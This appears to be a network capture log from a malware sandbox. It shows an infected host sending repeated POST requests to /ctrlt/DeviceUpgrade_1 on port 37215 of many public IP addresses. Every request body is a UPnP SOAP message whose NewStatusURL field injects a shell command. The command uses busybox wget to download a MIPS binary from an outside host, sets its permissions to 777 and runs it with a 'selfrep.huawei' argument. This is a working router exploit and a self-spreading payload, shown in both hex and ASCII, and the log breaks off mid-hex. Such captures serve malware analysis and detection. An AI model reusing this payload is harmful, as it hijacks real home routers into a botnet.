                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  193192.168.2.133412480.51.248.7837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.666111946 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  194192.168.2.134208841.191.126.4937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.666112900 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  195192.168.2.1335888197.119.24.20437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.666162968 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  196192.168.2.133509492.15.157.14037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.666218042 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  197192.168.2.1348334197.84.228.5637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.666282892 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  198192.168.2.1352876223.237.144.10737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.666287899 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  199192.168.2.1353190197.10.21.8237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.666310072 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  200192.168.2.1343254148.130.233.11437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.666338921 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  201192.168.2.134023641.6.6.5137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.666363001 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  202192.168.2.1339106197.227.178.18837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.666364908 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 